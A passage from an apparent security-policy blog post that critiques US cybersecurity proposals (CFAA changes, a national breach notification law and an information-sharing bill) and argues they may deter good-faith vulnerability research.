One challenge with finding the right approach for the CFAA is that research often looks much like nefarious activity and it’s hard to create law that allows for one and criminalizes the other. This is a challenge we MUST address.


The Personal Data Notification and Protection Act

We see a similar problem emerge with the Personal Data Notification and Protection Act, which aims to create consistency and clarity around breach notification requirements across the entire country (currently there are different laws on this in 47 individual states). The challenge here, again, is that research can look like a breach.


If a researcher accesses sensitive personally identifiable information (SPII) in the course of finding and investigating a vulnerability, then once the issue is disclosed to the business in question, the company will need to go through the customer notification process. To protect themselves from this, we could see organizations discouraging researchers from testing their systems by taking a hard-line stance that researchers will be prosecuted.


Apart from this concern, I’m generally supportive of creating consistency for breach notification requirements. This has been needed for a while and it should help both businesses and consumers to better understand their rights and what is expected of them in the case of a security incident.


The specifics of the bill look reasonable: 30 days for notification from discovery of the incident is not optimal, but is OK. The terms laid out for exemptions and the parameters on the kind of data that represents SPII seem fair. I do agree, though, with the EFF’s assertion that it would be better if this law were: “A ‘floor,’ not a ‘ceiling,’ allowing states like California to be more privacy protective and not depriving state attorneys general from being able to take meaningful action.”


Information Sharing

The emphasis on transparency of the breach notification piece was also present in an Information Sharing proposal; the latest in a long line of bills focused on encouraging the private sector to share security information with the Government. This proposal specifically asks for “cyber threat indicator” information to be shared via the National Cybersecurity and Communications Integration Center (NCCIC), and offers limited liability as an inducement.


This feels like the least impactful of the three bills to me. It’s a voluntary program and offers no hugely compelling incentive for participation, other than liability limitation. This supposes that the only barrier to information sharing currently is fear of liability, and I’m not convinced that’s accurate. For example, it’s often the case that organizations don’t know what’s going on in their environment from a security point of view, and don’t know what to look for or where to start. A shortage of security skills exacerbates this problem.


In addition, while I do think sharing this kind of information is potentially very valuable, I’m not convinced that doing so through the Government is the most efficient or effective way to realize this value, and I definitely don’t think it promotes collaboration between security and business leaders. In fact, I’m concerned that it could create a privileged class of information that is tightly controlled, rather than open and accessible to all. 


One thing this proposal does raise for me, though, is a question around liability. At present, in the relationship between a vendor and a researcher, all the liability rests on the shoulders of the researcher (and this weight increases under the new CFAA proposal). They carry all the risk; one false move or one poorly worded communication and they can be facing a criminal or civil action. The proposed information sharing bill doesn’t address that, but it got me thinking… if the Government is prepared to offer limited liability to organizations reporting cybersecurity information, perhaps it could do something similar for researchers disclosing vulnerabilities….


Will the President’s Cybersecurity Proposal Make Us More Secure?

If you’ve stuck with me this far, thank you and well done. As I said at the start of this piece, it’s good to see cybersecurity being prioritized and discussed by the Government. I hope something good will come of it, and certainly I think data breach notification and information sharing are important positive steps if handled correctly.


But as I’ve stated numerous times through this piece, I believe our best and only real chance for addressing the security challenge is identifying and fixing our vulnerabilities. The bottom line is that we can’t do that if researchers don’t want to conduct or disclose research for fear of ending up in prison or losing their home.


Again, it's important to remember that these are only initial proposals, and we're now entering a period of consultation in which various House and Senate committees will be looking at the goals and evaluating the language to see what will work and what won't.


It's critical that the security community participates in this process in a constructive way. We need to remember that we are more immersed in security than most, and share our expertise to ensure the right approach is taken. We share a common goal with the Government: improving cybersecurity. We can only do that by working together. 

 

Let me know what you think and how you're getting involved.


@infosecjen
